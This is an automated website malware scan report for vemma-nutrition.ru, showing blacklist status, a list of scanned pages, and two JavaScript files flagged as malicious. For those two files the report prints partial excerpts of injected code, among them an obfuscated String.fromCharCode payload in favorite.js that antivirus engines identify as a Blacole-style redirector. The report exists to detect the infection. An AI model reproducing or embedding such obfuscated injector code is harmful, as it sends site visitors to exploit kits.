New scan:

Malware Scanner report for vemma-nutrition.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "vemma-nutrition.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vemma-nutrition.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vemma-nutrition.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://vemma-nutrition.ru/
200 OK
Content-Length: 25685
Content-Type: text/html
clean
http://vemma-nutrition.ru/tmp/img/pigizo.js
200 OK
Content-Length: 109881
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\
... 3131 bytes are skipped ...
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); color: #FFFFFF; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .butn-inverse:hover, .butn-inverse:active, .butn-inverse.active, .butn-inverse.disabled, .butn-inverse[disabled] { background-color: #222222; color: #FFFFFF; } </style>');
document.write('<div id="basic-modal-content2" style="display:none"></div>'); document.write("<style>.hahivodn { display:none; }</style>");

Antivirus reports:

Bkav
W32.HfsIframe.3abf

http://vemma-nutrition.ru/js/250/addthis_widget.js
200 OK
Content-Length: 7397
Content-Type: application/x-javascript
clean
http://vemma-nutrition.ru/product-comparison.htm
200 OK
Content-Length: 14409
Content-Type: text/html
clean
http://vemma-nutrition.ru/js/jquery.js
200 OK
Content-Length: 21172
Content-Type: application/x-javascript
clean
http://vemma-nutrition.ru/js/interface.js
200 OK
Content-Length: 12770
Content-Type: application/x-javascript
clean
http://vemma-nutrition.ru/js/favorite.js
200 OK
Content-Length: 13254
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getBrowserInfo() {
var t="",v = "";
if (window.opera) t = 'Opera';
else if (document.all) {
t = 'IE';
var nv = navigator.appVersion;
var s = nv.indexOf('MSIE')+5;
v = nv.substring(s,s+1);
}
else if (navigator.appName) t = 'Netscape';
return { type:t, version:v };
}

function bookmark(a){
var url = window.document.location;
var title = window.document.title;
var b = getBrowserInfo();
if (b.type == 'IE'
... 3139 bytes are skipped ...
13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-683!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-NS [Trj]
DrWeb
JS.IFrame.233
Microsoft
Trojan:JS/Redirector.LD
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Prot
JS/Redir.NZ
Commtouch
JS/Redir.NZ

http://vemma-nutrition.ru/vemma-next.htm
200 OK
Content-Length: 21919
Content-Type: text/html
clean
http://vemma-nutrition.ru/vemma.htm
200 OK
Content-Length: 38344
Content-Type: text/html
clean
http://vemma-nutrition.ru/verve.htm
200 OK
Content-Length: 30720
Content-Type: text/html
clean
http://vemma-nutrition.ru/vemma-thirst.htm
200 OK
Content-Length: 29742
Content-Type: text/html
clean
http://vemma-nutrition.ru/company.htm
200 OK
Content-Length: 20682
Content-Type: text/html
clean
http://vemma-nutrition.ru/doki.htm
200 OK
Content-Length: 15223
Content-Type: text/html
clean
http://vemma-nutrition.ru/best.htm
200 OK
Content-Length: 20365
Content-Type: text/html
clean
http://vemma-nutrition.ru/presentations.htm
200 OK
Content-Length: 12959
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vemma-nutrition.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 13:35:42 GMT
Server: nginx/0.8.54
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.5-1ubuntu7.11
Second query (visit from search engine):
GET / HTTP/1.1
Host: vemma-nutrition.ru
Referer: http://www.google.com/search?q=vemma-nutrition.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.